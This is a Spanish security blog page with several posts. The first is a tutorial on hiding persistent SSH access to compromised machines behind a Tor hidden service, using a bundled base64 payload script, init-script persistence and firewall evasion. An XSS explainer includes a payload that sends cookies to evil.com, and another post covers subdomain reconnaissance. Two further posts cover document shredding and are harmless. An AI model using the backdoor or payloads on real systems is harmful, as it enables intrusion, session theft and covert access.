Thursday, 14 July 2016
¿CÓMO USAR TOR PARA LA EVASIÓN DE FIREWALL Y EL ACCESO REMOTO ANÓNIMO?
05:10
No comments
Cuando las direcciones IP que se utilizas
para mantener el acceso remoto son bloqueadas o descubiertas, si no estás listo
fracasaras y darás vuelta al punto de partida. Dependiendo de qué tan juguetón
es tu adversario, ellos pueden incluso tratar de saber quién es el
propietario de esas direcciones IP.
Introduzca
Tor – una solución simple. La red Tor se puede aprovechar para mantener el
acceso a los servidores comprometidos. Según curso de seguridad en redes,
el uso de la red Tor puede ser utilizado para ejecutar los servicios ocultos.
Podríamos conectarnos a nuestra victima infectada mediante el procedimiento
siguiente:
ssh -i
/path/to/key -p2222 someuser@ab88t3k7eqe66noe.onion
Esta
conexión se retransmitirá anónimamente a través de la red Tor, sin pasar por
las reglas del firewall, y potencialmente incluso por proxies y la inspección
de contenido confirman consultores de pruebas de penetración.
Usando
lo anterior con un túnel SSH; podemos hacer todo tipo de cosas grandes.
En una
máquina Windows, podría lograrse algo similar mediante la apertura del puerto
SMB 445 o puerto RDP 3389 a la red Tor.
¿CÓMO
HACERLO?
Vamos a
hacer esto en un nuevo Kali 2.0. El primer paso para la compilación de Tor es
descargar y extraer la fuente y la instalación de las dependencias requeridas:
Vamos a
construir Tor normalmente ejecutando los siguientes dos comandos en
serie:
./configure
make
Ahora
vamos a ir a ver el binario Tor que acaba de ser construido por nosotros usando
el comando “ldd” “. “Ldd” nos dirá lo que comparten las bibliotecas que se
cargan por el binario, para un binario estático no debe haber ninguna.
cd src/or
ldd tor
linux-vdso.so.1
(0x00007ffe02d00000)
libz.so.1
=> /lib/x86_64-linux-gnu/libz.so.1 (0x00007fd6982c3000)
libm.so.6
=> /lib/x86_64-linux-gnu/libm.so.6 (0x00007fd697fc2000)
libevent-2.0.so.5
=> /usr/lib/x86_64-linux-gnu/libevent-2.0.so.5 (0x00007fd697d7a000)
libssl.so.1.0.0
=> /usr/lib/x86_64-linux-gnu/libssl.so.1.0.0 (0x00007fd697b1a000)
libcrypto.so.1.0.0
=> /usr/lib/x86_64-linux-gnu/libcrypto.so.1.0.0 (0x00007fd69771f000)
libpthread.so.0
=> /lib/x86_64-linux-gnu/libpthread.so.0 (0x00007fd697502000)
libdl.so.2
=> /lib/x86_64-linux-gnu/libdl.so.2 (0x00007fd6972fe000)
libc.so.6
=> /lib/x86_64-linux-gnu/libc.so.6 (0x00007fd696f55000)
/lib64/ld-linux-x86-64.so.2
(0x00007fd6988b7000)
gcc -O2
-static -Wall -fno-strict-aliasing -L/usr/lib/x86_64-linux-gnu/ -o tor
tor_main.o ./libtor.a ../common/libor.a ../common/libor-crypto.a
../common/libcurve25519_donna.a ../common/libor-event.a
/usr/lib/x86_64-linux-gnu/libz.a -lm /usr/lib/x86_64-linux-gnu/libevent.a -lrt
/usr/lib/x86_64-linux-gnu/libssl.a /usr/lib/x86_64-linux-gnu/libcrypto.a
-lpthread -ldl
Si
corremos “ldd” contra el nuevo binario:
ldd tor
not a
dynamic executable
¡Eso
significa que funcionó!
CONFIGURACIÓN
DE TOR
Tor
está configurado en tiempo de ejecución apuntando a un archivo de
configuración, normalmente se llama “torrc”. Un ejemplo de archivo torrc se
muestra a continuación:
Bridge
176.182.30.145:443 DE54B6962AB7ECBB88E8BC58BEA94B6573267515
Bridge
37.59.47.27:8001 E0671CF9CB593F27CD389CD4DD819BF9448EA834
Bridge
192.36.27.122:55626 35E199EFB98CDC9D3D519EA4F765C021A216F589
UseBridges 1
SocksPort 9050
SocksListenAddress
127.0.0.1
HiddenServiceDir
./.hs/
HiddenServicePort
2222 127.0.0.1:22
Obtuvimos
anteriormente “bridges” de bridges.torproject.org. Probablemente deberías
obtener tus propios y reemplazarlos. Tenga en cuenta que si hay puertos TCP
específicos permitidos saliente en su entorno, debes encontrar un bridge que se
ejecute en los puertos explica consultor de pruebas
de penetración.
Para
ejecutar el servicio oculto para la prueba ejecuta lo siguiente:
./tor -f
/path/to/torrc
Un
nuevo directorio será creado, llamado “.hs”, en ese directorio habrá un archivo
llamado “hostname”. Si nos fijamos en el contenido de este archivo veremos la
dirección “.onion” donde se puede acceder a su servicio oculto.
cat
./hs/hostname
ab88t3k7eqe66noe.onion
Suponiendo
que el servicio SSH está ejecutando en la máquina, debemos ser capaces de
conectarnos a él desde otro ordenador a través de la red Tor de la siguiente
manera:
ssh -p2222
user@ab88t3k7eqe66noe.onion
El
comando anterior requiere que tengas una máquina conectada a la red Tor que
esté encaminando correctamente todo el tráfico TCP a través de Tor. La forma
más sencilla de hacer esto según curso de seguridad en redes es ejecutar de un
VM que haya configurado previamente esto por ti, como Tails o Whonix.
CREANDO
UN PLAYLOAD
Vamos a
crear un buen Playload que agrupe todas estas cosas en un bash script.
En
primer lugar vamos a copiar el archivo binario de “tor” y nuestro archivo
“torrc” a un nuevo directorio:
mkdir ~/payload
cp tor torrc
~/payload
cd ~/payload
Tor
requiere que el sistema lo ejecute, para tener un reloj preciso. Según curso de
seguridad en redes, una forma de solucionar esto es usar las cabeceras HTTP de
sitios web conocidos.
Todo
esto está automatizado por un script en Perl escrito por expertos de pruebas de penetración,
por lo que vamos a utilizar.
wget http://www.rkeene.org/devel/htp/mirror/archive/perl/htp-0.9.3.tar.gz
tar xzvf
htp-0.9.3.tar.gz
cp
htp-0.9.3/sbin/htpdate-light .
Vamos a
comprimir nuestros binarios en un archivo comprimido para reducir el tamaño de
carga útil.
tar
cvzf binaries.tar.gz tor htpdate-light
Ahora
vamos a crear nuestro script de playload, vamos a codificar el archivo con
base64 y crear un nuevo script “payload.sh”:
echo ‘#!/bin/sh’
> payload.sh
echo -n
‘torbin=’ >> payload.sh
cat
binaries.tar.gz | base64 -w 0 >> payload.sh
Ahora
abre “payload.sh” en el editor de texto y pegue el resto de la secuencia de
comandos que hay:
tar xzvf
binaries.tar.gz
rm
binaries.tar.gz
chmod +x tor
echo ‘
Bridge
176.182.30.145:443 DE54B6962AB7ECBB88E8BC58BEA94B6573267515
Bridge
37.59.47.27:8001 E0671CF9CB593F27CD389CD4DD819BF9448EA834
Bridge
192.36.27.122:55626 35E199EFB98CDC9D3D519EA4F765C021A216F589
UseBridges 1
SocksPort 9050
SocksListenAddress
127.0.0.1
HiddenServiceDir
./.hs/
HiddenServicePort
2222 127.0.0.1:22
‘ > ./torrc
perl
./htpdate-light google.com
./tor -f
./torrc
Para
ejecutar el script
bash payload.sh
Se debe
encender el servicio oculto Tor y enlazarlo al oyente SSH. Según curso de
seguridad en redes, sólo tenemos que copiar el nombre de host que se genera en
./.hs/hostname y conectarse a través de ssh.
YENDO
PERSISTENTE
Si
deseas que este se inicie en el reinicio del sistema y tendrás la acceso root a
la máquina, para la forma más fácil es simplemente modificar un script de
inicio existente. Según recomendaciones de expertos de pruebas de penetración,
lo ideal sería copiar los archivos binarios y archivos de configuración de Tor
a un lugar poco visible, y luego modificar la secuencia de comandos “init” para
que Tor se ejecute cuando se inicia el sistema.
EVADIR
PROTOCOLO DE INSPECCIÓN Y OFUSCAR EL TRÁFICO
Acuerdo
a expertos de pruebas de penetración, Tor se puede configurar con ofuscación y
pluggable transports para hacer que el tráfico vea algo como no lo es. También
hay opciones que pueden configurar en el archivo “torrc” para impulsar el
tráfico a través de un servidor proxy. Usted puede aprender más acerca de este
durante el curso de seguridad en redes.
¿CÓMO
PROTEGERSE?
Por
desgracia, este tipo de ataque es difícil de bloquear a nivel de red – es por
eso es que lo usamos. Usando pluggable transports y / o puentes de Tor bridges,
un experto de prueba de penetración puede ocultar el tráfico para que aparezca
como HTTP o HTTPS regulares, e incluso puede dirigirlo, a través de tu proxy
corporativa utilizando algunas opciones en el archivo “torrc”.
Según
maestros de curso de seguridad en redes El primer paso es para asegurar que el
tráfico de salida TCP está siendo correctamente filtrado. Todo el tráfico de
salida debe ser forzado a través del proxy corporativo.
Los
sistemas de inspección de paquetes en proxy pararán ingenuos intentos en este
tipo de ataque, según maestros de curso de seguridad en redes. Además aletas
deben estar configurados por las conexiones de Tor detectadas.
Tuesday, 12 July 2016
¿QUÉ ES DIN Y CUÁLES SON LOS NIVELES DE DESTRUCCIÓN DE DOCUMENTOS?
05:22
No comments
Cuando las agencias
gubernamentales o empresas comerciales están buscando en la destrucción de
documentos, deben saber que hay diferentes niveles de seguridad para la
destrucción de documentos. Hay seis niveles diferentes DIN de seguridad para la
destrucción segura de documentos. Ahora antes de explicar los niveles
determinados de seguridad, debe estar preguntando, ¿qué significa para DIN?
DIN estándar significa Deutsches
Institut fur Normung, que se dedica a la estandarización de la destrucción de documentos para las empresas gubernamentales y
comerciales. Actualmente existen alrededor de treinta mil normas DIN, que
abarca casi todos los campos de la tecnología; Sin embargo, para los niveles de
destrucción de documentos, que se conoce como la norma DIN 32757-1 estándar.
Ahora, exploraremos los diferentes niveles de seguridad para
destrucción de documentos. El primer nivel es el nivel general de seguridad
baja donde las que la dimensión de trituración son de aproximadamente ½
pulgada. Estos son aceptables para uso en el hogar. El segundo nivel es para
los tamaños más mínima alrededor de ¼ de pulgada y se utilizan generalmente
para pequeñas oficinas. Una vez que alcanzamos el nivel tres, las cosas
empiezan a ponerse serias. Este nivel está diseñado para destruir papel debajo
de 2 mm o un tamaño de letra confeti. Se utiliza para las oficinas que tienen
documentos confidenciales sobre miembros del personal o secretos de la empresa,
tales como planes de ventas. El tamaño cuarto nivel más mínima es de al menos
2mmx15mm y sobre todo puede ser utilizado en hospitales para cumplir las normas
de HIPAA, así como los bancos para cumplir con la Ley GLB para la protección de
información financiera de los consumidores y asegurar destrucción de
documentos.
El nivel cinco es de alta seguridad para destrucción de documentos y se empieza a ver las agencias
gubernamentales y militares que utilizan este nivel de destrucción de
documentos. Esto es para un tamaño de partículas de 0.8x12mm. Los cinco niveles
de seguridad son parte de la norma DIN para la destrucción de documentos. Sin
embargo, existe un nivel más que todavía no es un estándar DIN pero
absolutamente lo será y que es de nivel seis. Este es reconocido como el más
alto nivel de seguridad para destrucción de documentos donde los tamaños de
fragmentos no deben exceder de 0,8 x 4 mm. Esto también se conoce como
fragmentos aprobadas por la NSA.
Estos diferentes niveles de seguridad para destrucción de
documentos se han diseñado específicamente como un estándar para guiar a los
clientes a tomar una decisión informada en asegurarse de que están destruyendo
sus documentos no catalogados y clasificados, y asegurarse de que no lleguen a
las manos equivocadas.
Monday, 11 July 2016
¿QUÉ ES CROSS SITE SCRIPTING Y CÓMO SOLUCIONARLO?
03:15
No comments
¿Qué es Cross Site Scripting y cómo
solucionarlo?
Cross
Site Scripting es un tipo de ataque que se puede llevar a cabo para poner en
peligro a los usuarios de una página web y seguridad de páginas web. La
explotación de una falla XSS permite al atacante inyectar secuencias de
comandos en el lado del cliente en las páginas web visitadas por los usuarios.
A menudo se asume que significa JavaScript, pero también podría incluir,
VBScript según expertos de seguridad web.
Los
expertos de seguridad de páginas web dicen que es la vulnerabilidad más común, y
muchos sitios son afectados. Se extiende desde pequeños sitios privados locales
hacia gigantes como Google.
IMPACTO
POTENCIAL SOBRE SEGURIDAD WEB
Debido
a la capacidad de ejecutar JavaScript bajo el dominio del sitio, los atacantes
son capaces de:
§ Leer todos los cookies,
incluyendo los cookies de sesión. Al hacerlo, un atacante podría hacerse cargo
de la sesión.
§ Ver cualquier cosa que
el usuario ve, y robar información confidencial de este modo.
§ Cambiar lo que el
usuario ve y manipular la información.
§ Básicamente hacer todo
lo que un usuario normal puede, como el atacante puede ver y cambiar todo lo
que presentan al usuario. Esto incluye la derivación de todas las protecciones
CSRF implementadas para seguridad de páginas web. Para ponerlo en contexto; si
el atacante con éxito pueda ejecutar el XSS, el atacante puede hacer todo lo
que un administrador podría hacer.
§ Hacer cosas que el dominio
vulnerable tiene acceso a hacer, lo que puede comprar el acceso a la cámara web
del usuario, el micrófono o la ubicación.
EXPLOTACIÓN
DE SEGURIDAD WEB
Cualquier
fuente de datos que el navegador termina reproduciendo es un vector potencial
de ataque. Esto significa que hay muchas maneras diferentes potenciales para
explotar el sitio, y por lo tanto el riesgo de seguridad web aumenta.
Cross
site scripting es considerado uno de los más fáciles tipos de vulnerabilidad
para comprender. Dicho esto, no hay límites sobre lo complicado que puede ser,
para explotar bajo diferentes circunstancias y protecciones según expertos de
seguridad de páginas web.
¿CÓMO
DESCUBRIRLO?
Es
posible categorizar las vulnerabilidades de XSS en diferentes sub categorías.
Una de esas son las que sólo ponen en el cliente, en donde el propietario del
sitio tendría que analizar todo el JavaScript para identificar todos los flujos
de datos que se originan a partir de un usuario. En un primer momento, es fácil
pensar en sólo los lugares normales, pero después de un tiempo, es obvio que
hay muchos más vectores de los que se pensaba inicialmente.
Luego
están los llamados reflected XSS que también afecta la seguridad de páginas
web, que es cuando la página simplemente refleja algún tipo de entrada del
usuario. Por ejemplo:
<?php echo $_GET[“g]; ?>
Sin
embargo, también hay stored XSS que también afecta la seguridad de páginas web,
en el que el servidor muestra algo que está en la base de datos. En resumen, se
puede concluir que para descubrir el primer tipo mencionado necesitaría el
propietario del sitio seguir el flujo de datos a lo largo de JavaScript para
ver cómo trata la entrada del usuario. En este caso, la entrada del usuario
pueden ser variables predeterminadas en JavaScript como location.hash, así
como, por ejemplo, form-data. Para la segunda vulnerabilidad los expertos de
seguridad web mencionan que el propietario del sitio tiene que buscar cada
ubicación donde se imprimieron datos, e identificar la forma en que trataron,
así como donde se originan. En los ejemplos de la vida real, no es raro ver a
una combinación de estos tipos de vulnerabilidad.
EJEMPLO DE CÓDIGO DE APLICACIÓN
VULNERABLE
Suponga
que un sitio tiene un cuadro de búsqueda con el código como el siguiente:
<?php // Code for performing the actual search }
else { echo “Could not find any pages when searching for
“.$_GET[‘query’];} ?>
https://example.com/search.php?query=test
Could not find any pages when searching for test
Esto
haría salida de la entrada del usuario directamente al documento HTML. Por lo
tanto, si un usuario diera HTML como entrada sería necesario para al navegador
a aceptar eso.
Por
ejemplo, si tuviéramos que acceder
https://example.com/search.php?query=<script>//
Eso
daría lugar a lo siguiente que el navegador trataría de hacer.
No se
pudo encontrar ninguna página en la búsqueda de
<script>alert(1)</script>
Esto es
perfectamente válido HTML, y el script lo ejecutara.
Para
mostrar el peligro de esto, imagina a un atacante consiguiendo que el usuario
haga clic en un enlace como el siguiente:
https://example.com/search.php?query=<script>document.InnerHTML
+= “<img src=’
http://evil.com?cookie=”+document.cookie+”‘>”</script>
http://evil.com?cookie=”+document.cookie+”‘>”</script>
El
resultado sería este, que envía las cookies al atacante. Por ejemplo, fueron
sesiones de identificación, un atacante podría secuestrar la sesión.
No se
pudo encontrar ninguna página en la búsqueda de
<script>document.InnerHTML += “<img
src=’http://evil.com?cookie=”+document.cookie+”‘/>”</script>
Deben
sanitar las entradas de datos. La aplicación también debe desarrollarse con el
riesgo de XSS en cuenta, y resolver las vulnerabilidades XSS. Dos de los métodos
más conocidos de esto es HttpOnly y CSP. Pueden aprender más sobre cómo
arreglar XSS durante el curso de seguridad web.
Saturday, 9 July 2016
¿CÓMO DESCUBRIR FÁCILMENTE SUBDOMINIOS PARA HACER ATAQUE CIBERNÉTICO?
01:11
No comments
Este artículo es para
fines educativos solamente. Cuando buscamos un blanco para hacer pruebas
de seguridad informática sobre un blanco * .target.com, siempre es una buena
idea buscar el camino menos problemático. Aplicaciones exóticas y olvidadas que
se ejecutan en subdominios con nombres extraños conducirán rápidamente a
descubrir las vulnerabilidades críticas y, a menudo grandes pagos. Según curso
de seguridad web, el descubrimiento de estos subdominios es una habilidad
crítica para un hacker y la elección de las técnicas y herramientas adecuadas
es de suma importancia.
Hay muchas técnicas para el descubrimiento de un subdominio, a
partir de la utilización de los recursos públicos, tales como Google o
VirusTotal, con fuerza bruta, a veces también el escaneo de un bloque de IP y
hacer búsquedas inversas. Cualquiera de estos métodos lograra resultados
aceptables, mientras que una combinación de ellos asegura una solución más
amplia durantepruebas de
seguridad informática.
RECURSOS
PÚBLICOS PARA DESCUBRIMIENTO DE SUBDOMINIOS:
Acuerdo con maestros de curso de seguridad web, hay una serie de
recursos públicos para grabar información de subdominio. Algunos de estos
sitios son creados para ese propósito específico, mientras que otros como el
índice de los motores de búsqueda, que eso es para lo que están diseñados a
hacer. Aquí está un ejemplo:
Sacar subdominios de Google es un trabajo fácil con Google
Dorks. La Directiva sobre sitio filtrará los resultados de su sitio solo y
ayuda mucho durante pruebas de seguridad informática:
Después de que tengamos el dominio inicial dentro, allí podamos
utilizar la directiva -inurl. Ese subdominio que encontramos entonces se puede
filtrar con más directivas -inurl para hacer lugar para otros:
Después de notar e
interactuar a través de todas las posibilidades (hasta que lleguemos a no tener
más resultados de nuestras búsquedas) obtenemos algunos subdominios menciona
maestros de curso de seguridad web. Para hacer esto manualmente es un dolor de
cabeza, pero, existen herramientas que ayudan a automatizar esto y también
consultar múltiples motores de búsqueda en el momento.
Los recursos públicos que podemos usar durante pruebas de
seguridad informática:
§ Los motores de búsqueda (Google,
Bing, Yahoo, Baidu)
§ www.virustotal.com – Búsqueda de “dominio: target.com” y VirusTotal proporcionará
amplia información, además de los sub-dominios observados, lo cual es una lista
de todos los subdominios que dispone de información.
§ www.dnsdumpster.com – El nombre lo dice todo. Entrar en el dominio de destino, y
busca.
§ https://crt.sh/?q=%25target.com – A veces SSL es una mina de oro de información. Utilice este
sitio mediante la búsqueda de “% target.com” y eso sacará subdominios para ti.
Fácil de ganar.
§ https://censys.io – No es genial, pero tiene alguna información útil a veces.
§ http://searchdns.netcraft.com/ – No es genial, pero tiene alguna información útil a veces.
§ https://www.shodan.io – Shodan es una infraestructura basada en spider con una
información asociada con la base de datos que se hizo principalmente para
profesionales de pruebas de seguridad informática. Cuenta con datos históricos
y actuales sobre una gran franja de los servidores de la red, incluyendo los
subdominios vistos, manejo de versiones del servidor, y mucho más.
FUERZA
BRUTA:
Raspando lo que hay en el Internet puede ser un medio rápido
para la inclusión de una buena parte de los sub-dominios disponibles de un
blanco. El otro, a veces mejor parte se puede encontrar mediante la prueba de
palabras comunes como subdominios por fuerza bruta a través del espacio posible
de caracteres alfanuméricos. Si un no-averiguable subdominio esta por ahí,
fuerza bruta a veces puede encontrarlo. Y si la fuerza bruta de forma
recursiva encontró a cada subdominio, usted está en un buen camino para encontrar
activos importantes acuerdo con maestros de curso de seguridad web.
Hay muchas herramientas que o bien fueron construidas
específicamente para fuerza bruta de DNS o soporte como funcionalidad y cual
podrían aprender durante curso de
seguridad web. Ellos hacen que sea fácil
recorrer rápidamente a través de una gran lista de palabras y el uso de
múltiples procesos para la velocidad / eficiencia. Aquí está una lista
exhaustiva de las herramientas que ayudan a tal esfuerzo:
§ Subbrute – Un DNS meta-query spider que
enumere los registros DNS, subdominios.
§ dnscan –
Un escáner de subdominio DNS de phyton basado en lista de palabras.
§ Nmap – Sí, es un escáner de puertos, pero
puede hacer fuerza bruta de subdominios también.
§ Recon-Ng – La estructura recon-ng tiene un
módulo brute_hosts que permite hacer fuerza bruta de los subdominios.
§ DNSRecon – Una poderosa enumeración de
secuencia de comandos DNS.
§ Fierce – Un escáner de enumeración
semi-ligero.
§ Gobuster –
Una herramienta alternativa de directorio de archivo
escrita en Go.
§ DNSenum – Ofrece una enumeración de sub
dominios recurrentes y suporta múltiples procesos.
§ AltDNS – Ofrece fuerza bruta basado en
permutaciones de los dominios ya se encuentrados.
Algunas de estas herramientas tienen sus listas de palabras
incorporadas para ataques de fuerza bruta, pero otros requieren que se
establezca. En función de la potencia de procesamiento disponible, una de estas
listas traerá de vuelta resultados sólidos.
La siguiente imagen muestra la herramienta subbrute en acción:
Y nmap:
PONIENDO TODO JUNTO
Enumall.sh es un código escrito para automatizar el proceso de
recolección de sub dominios fuera los recursos públicos, así como para hacer
ataques de fuerza bruta sobre dominios. El código se basa en el marco de
Recon-Ng.
Google y algunos otros
módulos de Recon-Ng requieren claves de la API para que funcione correctamente.
Puede encontrar instrucciones sobre cómo hacerlo en el curso de seguridad web.
LA DESTRUCCIÓN DE PAPEL: REGULACIONES Y CUMPLIMIENTO LEGAL
01:04
No comments
La mayoría de las empresas,
independientemente de su tamaño, recogen información confidencial de los
clientes y los empleados sin contar con servicios de empresa de destrucción de
papel para destrucción de documentación confidencial. Esto incluye los nombres,
fechas de nacimiento, direcciones, números de seguridad social y mucho más. En
las manos equivocadas, esta información puede causar un montón de problemas con
el robo de identidad, tanto para el individuo y la sociedad.
Según expertos de empresa de destrucción de papel, varias leyes están en su lugar de dictar
cómo la información confidencial se almacena y asegurada, y, cuando llegue el
momento, hacer la destrucción de documentación confidencial. Muchas industrias
tienen sus regulaciones de destrucción de documentación confidencial también,
como la industria médica (HIPAA), la industria de crédito (FACTA), la industria
bancaria (GLAB) y agencias gubernamentales (GSA).
También es importante tener en
cuenta que con los grandes avances en la tecnología, la destrucción
de documentación confidencial se
extiende más allá de los archivos de papel, sino que también incluye
dispositivos de almacenamiento digital, tales como unidades de disco, / DVDs,
unidades flash USB de disco de CD y ordenadores portátiles. Algunas empresas de
destrucción de papel también pueden destruir los prototipos y muestras de
productos para ayudar a proteger secretos de la compañía.
Una buena política de gestión
de documentos es útil con la formación de los empleados de cómo manejar
materiales delicados. Estas son algunas de las normas a tener en cuenta al
crear las políticas y procedimientos con la ayuda de empresa de destrucción de
papel.
SERVICIOS DE NAID-CERTIFICADOS
La Asociación Nacional para la
Destrucción de la Información, o NAID, es un grupo sin fines sin lucro que
certifica documentos y otras empresas de destrucción de información privada.
NAID asegura que compañías sigan todas las regulaciones gubernamentales, tanto
federales como locales, y estén manteniendo todos los servicios de trituración
y destrucción de documentación confidencial. Se requieren varias industrias
para utilizar un servicio de destrucción de papel NAID-certificada, para cuidar
de sus necesidades destrucción de documentación confidencial. Estos servicios
están equipados y entrenados para cumplir con las regulaciones de privacidad de
información, incluyendo HIPAA, FACTA, GLAB y GSA según expertos de Dim
Destruición una empresa de destrucción de papel en México.
TAMAÑOS
DE TRITURACIÓN
Algunas leyes regulan realmente
el tamaño de la trituración necesaria para destrucción de documentación
confidencial. Hay seis tamaños para elegir. El nivel 1 es una pizca de banda de
corte estándar que se encuentra generalmente en trituradoras de papel. Esto
está bien para el correo no deseado, pero la información más sensible requiere
fragmentos más pequeños que son más difíciles de reconstruir. Nivel 5 es un
pequeño fragmento de corte transversal, mientras que la más segura, Nivel 6, se
refiere a menudo como confeti. HIPAA y otros documentos confidenciales requieren
este nivel superior de la trituradora según expertos de Dim Destruición una
empresa de destrucción de papel en México.
NO VER, NO MANTENER
Cuando es hora de destruir los
documentos que contengan confidencialidad del cliente y la información de los
empleados, estos archivos se necesitan proteger para que no caigan en las manos
equivocadas antes de que puedan ser destruidos. Consolas aseguradas o
contenedores de recogida, son una manera fácil de mantener la información
segura. Con una pequeña ranura para deslizarse en el documento, estas consolas
no se pueden abrir, excepto por una persona entrenada, certificada y
autorizada. Incluso entonces, estos profesionales de empresa de destrucción de
papel son instruidos para no manejar la información confidencial sino más bien
transportar los contenedores hasta el punto de destrucción de documentación
confidencial. Allí, los contenedores son desbloqueado e inmediatamente
descargados para que el trabajador no maneja físicamente o vea los documentos.
Esto reduce enormemente la posibilidad de que alguien sea capaz de agarrar esa
información. También es un requisito para varias industrias.
CERTIFICADO DE DESTRUCCIÓN
Una vez que los archivos han
sido destruidos, debes conservar el certificado de destrucción de documentación
confidencial. Esta es la prueba física que has tomado todas las medidas
necesarias y adecuadas para asegurar tus documentos importantes fueron
triturados correctamente. Cada empresa de destrucción de papel NAID
certificada, proporciona esta prueba. Mantenga este seguro ya que a menudo las
industrias son auditadas para garantizar el cumplimiento. Si su empresa es
auditada este certificado de destrucción es la prueba de que usted y su
personal están siguiendo las reglas.
La mejor manera de prevenir el
robo de identidad es ser precavido. Una forma de estar preparado es la
implementación de políticas y procedimientos que son seguros y en línea con los
requisitos y normativas legales de la empresa. Incluso si su empresa no está
obligada a ser lo más cuidadosa con su información confidencial, las buenas
prácticas con ayuda de empresa de destrucción de papel siempre traen otra capa
de protección y tranquilidad.


















